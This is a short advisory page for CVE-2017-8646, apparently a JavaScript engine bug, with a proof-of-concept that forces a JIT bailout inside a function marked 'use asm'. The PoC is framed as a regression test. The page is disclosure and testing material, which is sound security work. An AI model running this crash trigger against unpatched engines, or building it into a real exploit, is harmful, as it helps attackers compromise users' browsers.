CVE-2017-8646.md

CVE-2017-8646

  • Fix: Aug 2017
  • Credit: lokihardt of Google Project Zero

PoC

// Minimal reproduction case for CVE-2017-8646 (fixed Aug 2017 per this page).
// Useful as a regression test: a patched engine should run this to completion
// without crashing.
// NOTE(review): this page names neither the affected engine nor the root cause;
// presumably the bug is in how a JIT bailout is handled inside a function that
// was marked 'use asm' — confirm against the vendor advisory before relying on
// this description.
function asmModule() {
    // Opts this function into asm.js validation.
    'use asm';

    // The statements below (`let`, an array literal, a `for` loop at module
    // level) fall outside the asm.js module grammar, so this body is ordinary
    // JavaScript despite the directive above.
    let a = [1, 2, 3, 4];
    // 0x100000 iterations; per the original author's note, the point of the
    // long loop is to get it JIT-compiled.
    for (let i = 0; i < 0x100000; i++) {
        a[0] = 1;
        if (i === 0x30000) {
            // Storing an object into an array that so far held only integers.
            // Per the original author's note, this changes the array's type and
            // forces a bailout out of the JIT-compiled loop.
            a[0] = {};
        }
    }

    // asm.js-style function: `v | 0` coerces the argument to a 32-bit integer,
    // and the return value is coerced the same way.
    function f(v) {
        v = v | 0;
        return v | 0;
    }
    // The module's only export.
    return f;
}

// Runs the module once. The argument is unused: asmModule declares no
// parameters, and the returned function f is discarded.
asmModule(1);

Reference